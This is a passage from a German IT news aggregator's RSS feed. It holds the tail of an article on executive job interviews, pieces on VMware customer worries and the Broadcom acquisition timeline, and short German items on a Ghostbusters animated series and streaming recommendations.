<p>“Sometimes people at this level feel they don’t need to prep,” says Elliott. “This is a mistake. I encourage people to prep like a politician. Have your talking points down. It’s impossible to prepare for every potential interview question. Instead, prepare the points you want to get across and weave those into the conversation.”</p>



<h2 class="wp-block-heading">Get the balance right on social media</h2>



<p>It’s easy to track down company executives on social media, read what they have posted, connect with them, and attempt to make friends. But should you?</p>



<p>“You have to do that thoughtfully,” says Zhang. “There’s plenty of publicly available information.” Some of that will be in social media.</p>



<p>“LinkedIn is powerful,” says Elliott. “Especially for cross-functional partners. If you’re an IT leader, talking to product, UX, or sales and learning what’s important to them can be helpful.”</p>



<p>Again, though, be thoughtful about who you connect to, what you discuss, and what information you bring into the interview. There is a fine line between researching a company and coming off as creepy and invasive.</p>



<p>“You don’t want to say, ‘Oh, you took a fun trip a year ago!’” says Elliott. “But it can be helpful to know people’s background, if they came from engineering, or if you worked at similar companies. This interview is about seeing how you communicate, how you collaborate.” How you use social media is part of that.</p>



<h2 class="wp-block-heading">Prepare your stories</h2>



<p>Effective communication by and large finds its roots in storytelling. When you are preparing, <a href="https://www.cio.com/article/1288862/storytelling-for-cios-from-niche-to-bestseller.html">develop some stories about your leadership experiences</a> and have them ready. Recall examples of how you responded to a disaster, solved a problem, overcame an obstacle, or collaborated with a team. Curate your stories before the interview.</p>



<p>“Oftentimes, people tell me, ‘I’m strategic; I’m great at leading,’” says Elliott. And when he asks for examples, they are not ready. You don’t want to walk away from the interview and, only then, remember a story that demonstrates your quick, thoughtful decision-making skills. “They will want to see examples and hear stories. Have them ready,” he says.</p>



<p>Those stories should be largely pulled from the workplace, not your personal life — however adventurous or compelling. Keep examples pulled from your extreme sports or wilderness adventures to a minimum and, if you use stories like this, make sure you relate them back to the role at hand in ways that reflect well on the kind of leader you will be at their company.</p>



<h2 class="wp-block-heading">Unlearn previous ways of interviewing</h2>



<p>For lower-level interviews, and <a href="https://www.cio.com/article/288786/careers-staffing-how-to-prepare-for-and-ace-the-technical-interview.html">technical ones in particular</a>, searching for typical interview questions and asking an AI for the answers might pass muster. But at this level, the usual tricks around question preparation will backfire.</p>



<p>“This can be difficult,” says Elliot, “when you’re used to a right or wrong answer.”</p>



<p>Elliot’s clients often ask not only for the most common questions but also the best answers to them. “There isn’t a right or wrong answer,” he says, when it comes to the executive interview. “It’s more about strategy, business value, and the impact you can deliver.”</p>



<p>The IT leaders I spoke to agree.</p>



<p>When interviewing others for executive roles, they will ask questions or for a story, but they aren’t looking for boilerplate answers. They want to hear your talking points and ascertain how well you communicate.</p>



<p>“I’m tuned into their ability to communicate effectively at an executive level,” says Franchetti. “That’s going to be the difference between success and failure in their role. In addition to being able to do the fundamentals like get the job done and lead the team, I’m looking for them to be able to communicate with impact.”</p>



<p>So rather than prepping for a particular question, know what you want to say and how you want to say it. Focus on your goals. Prepare your stories. And use these questions as an opportunity to demonstrate your skills.</p>



<p>“As you climb in your career, it’s less about right or wrong, less about technical knowledge, and more about that high-level strategy and how you communicate,” Elliott says. “You have to unlearn earlier ways of interviewing.”</p>



<h2 class="wp-block-heading">Practice, practice, practice</h2>



<p>You should absolutely practice. <a href="https://www.cio.com/article/1293507/6-signs-you-might-need-an-executive-coach-and-2-signs-you-dont.html">Get an executive coach</a>. <a href="https://www.cio.com/article/288201/9-rules-for-working-with-headhunters-and-it-recruiters.html">Work with your recruiter</a>. Practice with a friend or spouse. This is a performance, and you want to be ready for it.</p>



<p>Elliott works with clients before an interview to help them do this.</p>



<p>“We develop their talking points,” he says. “And I’ll throw random questions at them. I find questions they haven’t prepped for to see how well they can answer these curveball questions using those talking points.”</p>



<p>This will be much easier to do in the interview if you practice beforehand.</p>



<h2 class="wp-block-heading">Ensure your dress reflects how you will show up for the role</h2>



<p>According to everyone I spoke to, the way you dress matters. But the fashion question doesn’t have a simple answer. Once upon a time, you could put on a suit and, as long as you weren’t dressed for a black-tie gala, never be overdressed. That’s not true anymore.</p>



<p>Franchetti, who is CIO of a tech company serving physical operations and based in San Francisco, expects candidates to dress for an interview. “I would expect someone to put effort into how they present themselves,” he says. “That reflects how they’re going to show up to the rest of the organization.” But it is possible to go too far. “If they turned up in a suit and tie, though, that might be over the top,” he says.</p>



<p>This can also vary from company to company. For example, in the financial or legal industry, that level of dress formality might be just what the situation calls for.</p>



<p>“Do your due diligence,” says Zhang. “Go on social media and try to get a sense for how they’re dressed at that company. Certain companies are more formal. If you show up there dressed in Silicon Valley clothes, there might be a culture shock — similarly, if you go into a casual environment wearing a full-on suit.”</p>



<h2 class="wp-block-heading">Recognize the value of the questions you ask</h2>



<p>There will come a point, often at the end of the interview, where you will be given the opportunity to ask questions. This is your chance to close on a strong note.</p>



<p>“What’s your goal?” asks Elliott. “What do you want them to learn about you? Start there and work backwards to develop your questions.”</p>



<p>Franchetti says, if you want to end strong, “Ask great questions. Have three really strong questions. You may not get them all in depending on the length of the interview. But ask insightful questions.”</p>



<p>Perhaps one of your questions is about the company culture. Don’t ask the interviewer to describe it. Ask a question that shows you have done your research.</p>



<p>“In other words,” says Franchetti, “Don’t ask, ‘What’s the culture like?’ Get more specific. Demonstrate that you know about this company, and you know what you’re talking about.”</p>



<p>Perhaps you researched the company’s culture on the website, social media, or news. “Tell them what you know about the culture,” says Franchetti and ask a specific question about it. “It would be great if someone asked me, for example, ‘Your operating principles really speak to me. Tell me how you put them into practice.’”</p>



<h2 class="wp-block-heading">Follow up to underscore fit and interest</h2>



<p>Sending a follow-up note might seem old-fashioned but everyone I spoke to agreed it’s a good idea. This doesn’t have to be long or complex. It can be a simple thank-you email. But you could also use it as an opportunity to drive home one of your goals or to reiterate a talking point.</p>



<p>“Follow up,” says apexanalytix CIO Grover. It shows that you are motivated, interested, hungry even, for this role at this company. “This is a good thing. Checking on something, following up, is never a negative. You don’t want to be a pest. But following up tells me that you want this.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Customer concerns loom as VMware Explore event approaches]]></title>
<description><![CDATA[VMware Explore 2024 is set to kick off next week, marking the first time for the flagship customer event since Broadcom finalized its acquisition of VMware last November.



The $60 million deal raised questions among enterprise customers from the minute it was proposed in May 2022: What will the...]]></description>
<link>https://tsecurity.de/de/2285464/it-security-nachrichten/customer-concerns-loom-as-vmware-explore-event-approaches/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2285464/it-security-nachrichten/customer-concerns-loom-as-vmware-explore-event-approaches/</guid>
<pubDate>Mon, 19 Aug 2024 14:50:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>VMware Explore 2024 is set to kick off next week, marking the first time for the flagship customer event since Broadcom <a href="https://www.networkworld.com/article/1248933/china-clears-broadcoms-69b-vmware-acquisition-allowing-deal-to-close.html">finalized its acquisition of VMware</a> last November.</p>



<p>The $60 million deal <a href="https://www.networkworld.com/article/1293388/broadcom-moves-roil-vmware-customer-base.html">raised questions among enterprise customers</a> from the minute it was proposed in May 2022: What will the new VMware look like? Will Broadcom raise prices, introduce new licensing models, or rationalize products? To date, the acquisition has led to some layoffs, production discontinuations, and shifts to the partner program. (Read more about the <a href="https://www.networkworld.com/article/3484025/vmware-by-broadcom-product-service-and-support-news.html">Broadcom-VMware timeline</a>)</p>



<p>VMware has about 300,000 customers, notes Stephen Elliot, group vice president at research firm IDC. “This means that you have every type of customer imaginable – small, medium, and large,” says Elliot, who has followed Broadcom’s acquisition of VMware since it was announced.</p>



<p>Among the broad VMware customer base, some consistent concerns have stayed at the forefront as the annual conference approaches. One is that customers want to continue to see innovation across the VMware portfolio, Elliot says. They also want a focus on integration, interface design, and an easier adoption path. “They are hungry for roadmap and architecture strategy sessions,” he says. “They are also looking for business value support when developing their use cases for executive management.”</p>



<p>In addition, customers are looking for help as they work across their internal teams, to sell the value of VMware to more buyers across the technology organization, Elliot says.</p>



<h2 class="wp-block-heading">Deep-seated uncertainty</h2>



<p>From the start, the acquisition led to real concern – and even animosity – among customers.</p>



<p>“Broadcom’s acquisition of VMware is disrupting established platform strategies and impacting sourcing, procurement, budgeting and architectural roadmaps, including strategic partnerships,” says Julia Palmer, a research vice president at research firm Gartner.</p>



<p>Gartner polled customers about the deal and found that 56% of impacted IT infrastructure and operations respondents are “very concerned” about the acquisition, while 42% are taking a wait-and-see approach, Palmer says.</p>



<p>Likewise, Naveen Chhabra, principal analyst at research firm Forrester, says organizations “are anxious about their exposure to VMware because they don’t know what their renewals would look like.”</p>



<p>“Tech leaders at large enterprises are considering alternatives,” Chhabra says.</p>



<p>Organizations that are <a href="https://www.networkworld.com/article/3486718/broadcom-distrust-drives-sales-for-vmware-competition.html">considering a platform shift</a> face a number of issues, Chhabra says. They’re concerned about how quickly they can move to a new platform, and whether the alternative vendors and products they’re considering will offer the capabilities they need. They also need to know whether the alternatives simply provide a replacement product or will actually fit into their existing IT ecosystems.</p>



<p>“I am talking to VMware enterprise clients each day,” Chhabra says. “I am consulting them on the pragmatic options and strategies. I believe VMware has gathered more animosity than it deserves or needs at this stage. Customers considered VMware a partner, but now they consider it a ‘necessary evil,’ and this change has happened almost overnight” following the acquisition.</p>



<p>Wakefield Research conducted a survey in June 2024 on behalf of CloudBolt Software, a provider of cloud financial management services. The findings provide some insight into how tenuous the situation is with many VMWare customers.</p>



<p>Wakefield surveyed 300 enterprise IT decision-makers across various industries that use VMware, and it found widespread apprehension among VMware users in the wake of Broadcom’s acquisition. In fact, nearly all respondents (99%) expressed concern, “reflecting a broad sentiment of unease across various industries, business sizes, and executive levels,” the report says. And the vast majority of respondents (95%) perceive Broadcom’s acquisition as disruptive to their IT strategy, with 46% considering it extremely or very disruptive.</p>



<p>Adding to these worries is the lack of clarity on pricing and packaging, the report says. All respondents expect VMware prices to rise under Broadcom’s ownership, with nearly three out of four anticipating an increase of greater than 100%. The research shows that many VMware customers indicate they have contracts expiring within the next 12 months, and 87% of respondents plan to make their “go-forward decision” within the next year.</p>



<h2 class="wp-block-heading">To stay with VMware or to move on?</h2>



<p>For those customers that are still anxious about the new VMware or might be considering jumping ship for other solutions, Eliot cautions that “this is a marathon, not a sprint. Customers are going to continue to work directly and with partners to understand where they want to go with VMware, and the related business and technology value aligned with each strategy.”</p>



<p>Every customer and partner should put the time and planning into understanding where they want to go with VMware, Eliot says.</p>



<p>“We have advised many technology leadership teams, and we often find they have to rethink the art of the possible with VMware,” Eliot says. “They pull together multiple teams to rethink where they want to go, and how to get there. It usually ends up with a renewal discussion, a roadmap discussion with VMware product teams, and a partner discussion on skills and expertise.”</p>



<p>“Are some customers having conversations about VMware alternatives? Yes,” Eliot says. “The smaller the VMware customer, the more it comes up. However, when it comes to replacement options that meet technology, security, scale, hardware support, skills, and process integration requirements [and considering] the total cost to migrate, the conversations often change to a renewal strategy.”</p>



<p>The conversation of what to do going forward needs to be about business value and reducing the business risk, Eliot says. Migrating away from VMware is not just a technology consideration. “VMware has four divisions today with much more focus and autonomy than before,” he says. “For many customers, this is going to be a very good change as technology execution moves forward.”</p>



<h2 class="wp-block-heading">Broadscale platform changes wouldn’t be easy</h2>



<p>Gartner clients have reported price increases for many VMware products, Palmer says, with some facing cost increases of two to five times. “As a result, stakeholders are seeking guidance from us to navigate this situation,” she says. “Based on thousands of inquiries Gartner conducted, customers are actively exploring alternative paths.”</p>



<p>This includes tactical moves such as hyperconverged solutions and alternative hypervisors, and strategic ones including distributed hybrid infrastructure platforms such as Azure stack HCI, AWS Outposts and others, container platforms, public cloud infrastructure-as-a-service (IaaS), and software-as-a-service (SaaS) solutions.</p>



<p>“Migrating from VMware’s server virtualization platform on a large scale would necessitate significant effort spanning multiple person-years, substantial one-time project costs, and entail business risks,” Palmer says. “Furthermore, the entire process would likely take anywhere from 18 to 48 months to complete.”</p>



<h2 class="wp-block-heading">Clarity and reassurance at the confab</h2>



<p>So, what does Broadcom need to do at the upcoming VMware Explore conference – and in the bigger picture – to reassure and retain VMware customers?</p>



<p>“Number one, communicate the continued technology product innovation that the VMware brand represents,” Eliot says. “They have been executing well since the deal closed, but not all customers are aware. The event is a great platform to get the word out on the product roadmaps and timing.”</p>



<p>A second point is about partners, Eliot says. “The company has not had this level of clarity on partners for over a decade,” he says. “There are four types of VMware partners today, and each is being treated differently for good reasons. Partners are looking at how to work with VMware, where the revenue and profit opportunities exist, and getting clarity on customer opportunities and [partners’] ability to differentiate. This will take some time but is moving rather quickly.”</p>



<p>There has been a lot of talk about Broadcom raising prices, <a href="https://www.networkworld.com/article/1287761/broadcoms-vmware-alterations-include-layoffs-changes-to-partner-programs.html">introducing a new licensing model</a>, and rationalizing products, so this might be a topic of discussion.</p>



<p>The subscription pricing model “was in progress for the past five years at VMware, so it’s not really new,” Eliot says. “The only difference now is this is the only model for customers. The product portfolio – and associated contracts – had gotten too complex for customers and partners.”</p>



<p>Product bundles are now the way forward for simplicity, Eliot says. “Customers now have to get educated on both the pricing model and bundles, so it’s taking time for them to understand the changes,” he says.</p>



<p>It also provides an opportunity for VMware, partners, and customers “to have conversations about roadmaps and future business value realization, and how broader adoption of the VMware portfolio can drive a higher business and technology return,” Eliot says. “It’s another opportunity for VMware, customers, and partners to revisit the business value conversation, and how VMware portfolio adoption can drive those returns.”</p>



<p>While obtaining a guarantee of price consistency is the most crucial aspect of the new VMware for customers, they are also seeking reassurances regarding investments in support, services, and R&amp;D roadmaps for all VMware products, Gartner’s Palmer says.</p>



<p>To that end, Broadcom needs to showcase a commitment and support for main VMware products, Palmer says. That includes clearly communicating a future roadmap and R&amp;D investments. The company also needs to address concerns raised in customer satisfaction surveys and show plans to improve support and services, Palmer says, as well as foster partnerships within the VMware ecosystem and its hyperscale partners.</p>



<p>Primarily, Broadcom/VMware needs to demonstrate that it understands – and will address – customer pains and challenges, Chhabra says. “Communicate, and acknowledge those pains,” he says.</p>



<h2 class="wp-block-heading">Read more about the Broadcom-VMware deal</h2>



<ul>
<li><a href="https://www.networkworld.com/article/3486718/broadcom-distrust-drives-sales-for-vmware-competition.html">Broadcom distrust drives sales for VMware competition</a></li>



<li><a href="https://www.networkworld.com/article/2511265/nutanix-hunts-disgruntled-vmware-customers.html">Nutanix hunts disgruntled VMware customers</a></li>



<li><a href="https://www.networkworld.com/article/3477692/broadcom-tosses-vmware-users-a-bone-extends-vsphere-7-support-six-months.html">Broadcom tosses VMware users a bone, extends vSphere 7 support six months</a></li>



<li><a href="https://www.networkworld.com/article/1293388/broadcom-moves-roil-vmware-customer-base.html">Broadcom moves roil VMware customer base</a></li>



<li><a href="https://www.networkworld.com/article/1249994/vmware-stung-by-defections-and-layoffs-after-broadcom-close.html">VMware stung by defections and layoffs after Broadcom close</a></li>



<li><a href="https://www.networkworld.com/article/1248933/china-clears-broadcoms-69b-vmware-acquisition-allowing-deal-to-close.html">China clears Broadcom’s $69 billion VMware acquisition, allowing deal to close</a></li>
</ul>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[VMware by Broadcom: Product, service and support news]]></title>
<description><![CDATA[News of Broadcom’s plans to acquire VMware triggered concerns among customers, partners, and industry watchers, many of whom recalled Broadcom’s track record with prior high-profile acquisitions, including network switching vendor Brocade in 2016 for almost $6 billion, software firm CA Technologi...]]></description>
<link>https://tsecurity.de/de/2278919/it-security-nachrichten/vmware-by-broadcom-product-service-and-support-news/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2278919/it-security-nachrichten/vmware-by-broadcom-product-service-and-support-news/</guid>
<pubDate>Thu, 15 Aug 2024 00:04:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>News of Broadcom’s plans to acquire VMware <a href="https://www.networkworld.com/article/1293388/broadcom-moves-roil-vmware-customer-base.html">triggered concerns among customers, partners, and industry watchers</a>, many of whom recalled Broadcom’s track record with prior high-profile acquisitions, including network switching vendor Brocade in 2016 for almost $6 billion, software firm CA Technologies in 2018 for $19 billion, and Symantec’s enterprise security business in 2019 for $10 billion. So far, the $60 billion Broadcom-VMware deal has led to some <a href="https://www.networkworld.com/article/1287761/broadcoms-vmware-alterations-include-layoffs-changes-to-partner-programs.html">layoffs</a>, VMware licensing changes, production rationalizations, and shifts to the partner program. Competitors are <a href="https://www.networkworld.com/article/3486718/broadcom-distrust-drives-sales-for-vmware-competition.html">claiming some success in attracting VM defectors</a>, though analysts aren’t reporting widespread migrations.</p>



<p>We’ve tracked the saga since Broadcom first announced plans to acquire VMware in May 2022. Here’s a record of what has transpired so far, plus the latest news and analysis.</p>



<h4 class="wp-block-heading">Broadcom distrust drives sales for VMware competition</h4>



<p><em>August 14, 2024</em>: Concerns about the new direction VMware is taking are <a href="https://www.networkworld.com/article/3486718/broadcom-distrust-drives-sales-for-vmware-competition.html">driving some enterprise customers to consider alternative platforms</a> from vendors such as Scale Computing, Nutanix and Oxide Computer. Scale Computing said in its most recent quarterly earnings announcement that sales have taken off and its new customers have doubled over the past year, thanks in part to Broadcom’s changes to VMware sales operations. </p>



<h4 class="wp-block-heading">Nutanix hunts disgruntled VMware customers</h4>



<p><em>July 01, 2024</em>: Nutanix began <a href="https://www.networkworld.com/article/2511265/nutanix-hunts-disgruntled-vmware-customers.html">aggressively courting VMware customers</a> who might be open to jumping ship in the wake of VMware’s purchase by Broadcom and some of the unpopular moves that followed. In addition, Nutanix recently signed key partnerships with some unlikely on-and-off competitors: Dell, Cisco and HPE. </p>



<h4 class="wp-block-heading">Broadcom tosses VMware users a bone, extends vSphere 7 support six months</h4>



<p><em>July 25, 2024:</em> Broadcom has announced that <a href="https://www.networkworld.com/article/3477692/broadcom-tosses-vmware-users-a-bone-extends-vsphere-7-support-six-months.html">VMware vSphere 7.x users will get six additional months of support</a> for the product. VMware vSphere 7, which was launched in 2020, was scheduled to go out of support in April 2025 but will now be maintained until October 2025.</p>



<h4 class="wp-block-heading">Broadcom bolsters VMware Edge Compute Stack</h4>



<p><em>June 26, 2024</em>: <a href="https://www.networkworld.com/article/2505481/broadcom-bolsters-vmware-edge-compute-stack.html">A slew of updates in VMware ECS 3.5</a> are aimed at helping customers more easily manage edge devices, applications, and infrastructure across multiple locations. Updates include zero-touch orchestration capabilities, pull-based architecture, and edge fleet management.</p>



<h4 class="wp-block-heading">European trade body lashes out at Broadcom’s VMware licensing changes</h4>



<p><em>Apr 23, 2024</em>: Cloud Infrastructure Services Providers in Europe (CISPE) <a href="https://www.networkworld.com/article/2094445/european-trade-body-lashes-out-at-broadcoms-vmware-licensing-changes.html">strongly criticized Broadcom’s response</a> to concerns regarding its licensing changes. The trade organization said the economic viability of many cloud services utilized by customers in Europe is threatened by “the massive and unjustifiable hikes in prices, the re-bundling of products, the altered basis of billing.”</p>



<h4 class="wp-block-heading">Broadcom changes VMware pricing amid customer backlash and EU questioning</h4>



<p><em>April 16, 2024</em>: <a href="https://www.networkworld.com/article/2092056/broadcom-changes-vmware-pricing-amid-customer-backlash-and-eu-questioning.html">Licensing changes</a> include a standardization of the metric for pricing offerings across cloud providers to per-core licensing – the same metric used in end-customer licensing. Meanwhile, Broadcom President and CEO Hock Tan pledged support to customers and clarified how the company would offer VMware products and support going forward.</p>



<h4 class="wp-block-heading">Broadcom repackages VMware SASE, adds Symantec security</h4>



<p>February 27, 2024: Broadcom revived the VMware VeloCloud SD-WAN branding and tied that technology with Broadcom’s Symantec Enterprise Cloud security service edge offering to create <a href="https://www.networkworld.com/article/1310152/broadcom-repackages-vmware-sase-adds-symantec-security.html">its single-vendor SASE package</a>. </p>



<h4 class="wp-block-heading">Broadcom sells VMware end-user computing unit to KKR for $4 billion</h4>



<p><em>February 26, 2024</em>: Broadcom signed an agreement to <a href="https://www.networkworld.com/article/1309849/broadcom-sells-vmware-end-user-computing-unit-to-kkr-for-4-billion.html">sell its end-user computing unit to investment firm KKR</a> for $4 billion. KKR said the EUC division will become a standalone company run by its existing management team and led by Shankar Iyer.</p>



<h4 class="wp-block-heading">Broadcom moves roil VMware customer base</h4>



<p><em>January 22, 2024</em>: While Broadcom’s actions are causing concern among VMware users, these decisions have not been completely unexpected based on the company’s track record with its prior acquisitions of CA and Symantec. There’s no rush to the exits yet, but <a href="https://www.networkworld.com/article/1293388/broadcom-moves-roil-vmware-customer-base.html">VMware customers are investigating alternatives</a> as the Broadcom era begins.</p>



<h4 class="wp-block-heading">Broadcom’s VMware alterations include layoffs, changes to partner programs</h4>



<p><em>January 05, 2024</em>: Steven Elliot, group vice president of infrastructure software at IDC, said the <a href="https://www.networkworld.com/article/1287761/broadcoms-vmware-alterations-include-layoffs-changes-to-partner-programs.html">layoffs and consolidation</a> are a good and necessary thing. He noted that Broadcom is not only cutting staff but also cutting products to focus on core competency.</p>



<h4 class="wp-block-heading">Broadcom to lay off over 1,200 VMware employees as deal closes</h4>



<p><em>December 01, 2023</em>: In a filing with the California Employment Development Department, <a href="https://www.networkworld.com/article/1250690/broadcom-to-lay-off-over-1200-vmware-employees-as-deal-closes.html">Broadcom announced plans to lay off 1,267 VMware employees</a> in January 2024.</p>



<h4 class="wp-block-heading">VMware stung by defections and layoffs after Broadcom close</h4>



<p><em>November 30, 2023</em>: Layoffs are inevitable after an acquisition as companies deal with overlap and redundancy. But on top of that, VMware lost its No. 2 executive: Sumit Dhawan, president of the company since 2021, left the firm to become the new CEO of cybersecurity vendor Proofpoint. Outside the company, <a href="https://www.networkworld.com/article/1249994/vmware-stung-by-defections-and-layoffs-after-broadcom-close.html">there’s concern about customer retention</a>.</p>



<h4 class="wp-block-heading">China clears Broadcom’s $69 billion VMware acquisition, allowing deal to close</h4>



<p><em>November 21, 2023</em>: Five days before the two companies’ merger agreement was due to expire, the deal passed its final regulatory hurdle. <a href="https://www.networkworld.com/article/1248933/china-clears-broadcoms-69b-vmware-acquisition-allowing-deal-to-close.html">China cleared Broadcom’s $69 billion acquisition of VMware</a>, leaving the two companies free to close the transaction on November 22.</p>



<h4 class="wp-block-heading">Generative AI dominates VMware Explore news</h4>



<p><em>August 25, 2023</em>: There were some <a href="https://www.networkworld.com/article/957216/generative-ai-dominates-vmware-explore-news.html">cloud announcements at VMware Explore 2023</a> in Las Vegas, but AI was the star, as it has been at nearly every tech company lately. Vendors have been rushing to add generative AI to their platforms, and VMware is no exception.</p>



<h4 class="wp-block-heading">UK competition agency provisionally OKs Broadcom’s $61 billion VMware acquisition</h4>



<p><em>July 19, 2023</em>: The UK’s Competition Market Authority (CMA) provisionally <a href="https://www.networkworld.com/article/972449/uk-competition-agency-provisionally-oks-broadcoms-6b-vmware-acquisition.html">cleared Broadcom’s proposed acquisition of VMWare</a>, paving the way for the $61 billion deal to go ahead. The clearance followed an investigation by the CMA, which looked into whether the proposed merger would harm the ability of Broadcom’s rivals to compete with VMware’s server virtualization software.</p>



<h4 class="wp-block-heading">Broadcom CEO pledges $2 billion for VMware R&amp;D, professional services support</h4>



<p><em>May 05, 2023</em>: Broadcom said it will <a href="https://www.networkworld.com/article/972224/broadcom-ceo-pledges-2-billion-for-vmware-rd-professional-services-support.html">spend $2 billion a year to accelerate research and development</a> for VMware products and services. “As a part of Broadcom, VMware will have more resources and scale to support the number of customers that want its technology and services, and help customers deploy it more than it was able to as a standalone company,” Broadcom CEO Hock Tan wrote in a blog post.</p>



<h4 class="wp-block-heading">Broadcom, VMware extend deadline to complete acquisition by 90 days</h4>



<p><em>February 20, 2023</em>: Broadcom and its acquisition target VMware agreed to give themselves another 90 days to complete the $61 billion acquisition they announced on May 26, 2022. A regulatory filing by VMware showed that both companies had delivered a mutual notice to <a href="https://www.networkworld.com/article/971947/broadcom-vmware-extend-deadline-to-complete-acquisition-by-90-days.html">extend the final date of the merger</a> to twelve months from the day the deal was announced.</p>



<h4 class="wp-block-heading">UK competition agency launches inquiry into Broadcom’s $61B VMware buy</h4>



<p><em>November 21, 2022</em>: The UK’s Competition and Market’s Authority (CMA) <a href="https://www.networkworld.com/article/971655/uk-competition-agency-launches-inquiry-into-broadcoms-61b-vmware-buy.html">announced its investigation of Broadcom’s proposed acquisition of VMware</a>, looking into whether the proposed merger “may be expected to result in a substantial lessening of competition within any market or markets in the United Kingdom for goods or services.”</p>



<h4 class="wp-block-heading">Broadcom’s VMware acquisition sparks concern</h4>



<p><em>September 22, 2022</em>: In light of Broadcom’s less-than-stellar track record with prior acquisitions, <a href="https://www.networkworld.com/article/971472/broadcoms-vmware-acquisition-sparks-concern.html">VMware’s enterprise customers are understandably worried</a>. “Following the purchases of CA and Symantec, Broadcom raised prices, decreased support, and stopped investing in innovation,” said Tracy Woo, senior analyst for Forrester. “VMware customers would be wise to have an exit plan.”</p>



<h4 class="wp-block-heading">Why it makes sense for Broadcom to buy VMware</h4>



<p><em>July 04, 2022</em>: <a href="https://www.networkworld.com/article/971210/why-it-makes-sense-for-broadcom-to-buy-vmware.html">Broadcom’s chips plus VMware software</a> could be the bridge that connects applications in data centers with the cloud, said Network World columnist Tom Nolle.</p>



<h4 class="wp-block-heading">Can Broadcom + VMware move enterprise networking forward?</h4>



<p><em>May 26, 2022</em>: Industry watchers suggested that Broadcom’s planned acquisition of VMware could open <a href="https://www.networkworld.com/article/971102/can-broadcom-vmware-move-enterprise-networking-forward.html">opportunities to reach enterprise and telco companies</a> with innovative technology. Some questioned whether Broadcom would let VMware further develop tools for 5G, software-defined networking (SDN), and other technologies.</p>



<h4 class="wp-block-heading">Broadcom targets enterprise infrastructure with $61 billion VMware acquisition</h4>



<p><em>May 25, 2022</em>: The Broadcom-VMware saga kicked off when the semiconductor manufacturer and infrastructure software giant <a href="https://www.networkworld.com/article/971106/broadcom-targets-enterprise-infrastructure-with-61b-vmware-acquisition.html">first announced plans to acquire the virtualization and enterprise cloud vendor</a> in a deal worth roughly $61 billion in stock and cash.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Netflix: Animationsserie zu „Ghostbusters“ in der Mache]]></title>
<description><![CDATA[Netflix hat bereits 2022 eine Animationsserie zu den berühmten „Ghostbusters“ in Auftrag gegeben, das möchte Variety zumindest von Quellen erfahren haben. Elliot Kalan ist als Drehbuchautor und ausführender Produzent am Werk. Zur Geschichte weiß man aktuell noch nichts, es soll...Zum Beitrag: Net...]]></description>
<link>https://tsecurity.de/de/2276012/it-nachrichten/netflix-animationsserie-zu-ghostbusters-in-der-mache/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2276012/it-nachrichten/netflix-animationsserie-zu-ghostbusters-in-der-mache/</guid>
<pubDate>Tue, 13 Aug 2024 16:32:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Netflix hat bereits 2022 eine Animationsserie zu den berühmten „Ghostbusters“ in Auftrag gegeben, das möchte Variety zumindest von Quellen erfahren haben. Elliot Kalan ist als Drehbuchautor und ausführender Produzent am Werk. Zur Geschichte weiß man aktuell noch nichts, es soll...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/netflix-animationsserie-zu-ghostbusters-in-der-mache/">Netflix: Animationsserie zu „Ghostbusters“ in der Mache</a>
</p><p>
Zum Blog: <a href="https://stadt-bremerhaven.de/">Caschys Blog</a>
</p><p>

Du kannst uns mit jedem deiner Käufe über Amazon unterstützen. Dein Preis bleibt gleich, wir erhalten eine kleine Provision. <a href="https://amzn.to/4cubcxv">Nutze einfach diesen Link</a>. Danke dafür!</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die besten TV-Serien, die Sie 2024 streamen können]]></title>
<description><![CDATA[Bei dem Überangebot an Streaming-Diensten und Inhalten ist es schwer, die Übersicht zu behalten und keine Serien-Highlights zu verpassen. Wir fassen in den folgenden Absätzen einige der besten Serien zusammen, die Sie aktuell streamen können. Neben einer kurzen Zusammenfassung des Inhalts finden ...]]></description>
<link>https://tsecurity.de/de/2250775/windows-tipps/die-besten-tv-serien-die-sie-2024-streamen-koennen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2250775/windows-tipps/die-besten-tv-serien-die-sie-2024-streamen-koennen/</guid>
<pubDate>Mon, 29 Jul 2024 13:32:06 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Bei dem Überangebot an Streaming-Diensten und Inhalten ist es schwer, die Übersicht zu behalten und keine Serien-Highlights zu verpassen. Wir fassen in den folgenden Absätzen einige der besten Serien zusammen, die Sie aktuell streamen können. Neben einer kurzen Zusammenfassung des Inhalts finden Sie auch Details dazu, bei welchen Anbietern die Serien verfügbar sind. </p>



<p><strong><em>Lesen Sie auch: </em></strong><a href="https://www.pcwelt.de/article/1158913/streaming-vergleich-netflix-prime-video-disney-co.html" target="_blank" rel="noreferrer noopener">Streaming-Vergleich: Netflix, Prime Video, Disney+ und Co.</a></p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading toc">Shōgun (Disney+)</h2>



<p><img decoding="async" class="wp-image-2351956" src="https://b2c-contenthub.com/wp-content/uploads/2024/05/5_1d2303.png" alt="Shōgun" loading="lazy"></p>



<p><a href="https://www.disneyplus.com/de-de/series/shogun/77sCbAqhMU5H" target="_blank" rel="noreferrer noopener">Streamen Sie Shōgun auf Disney+</a></p>



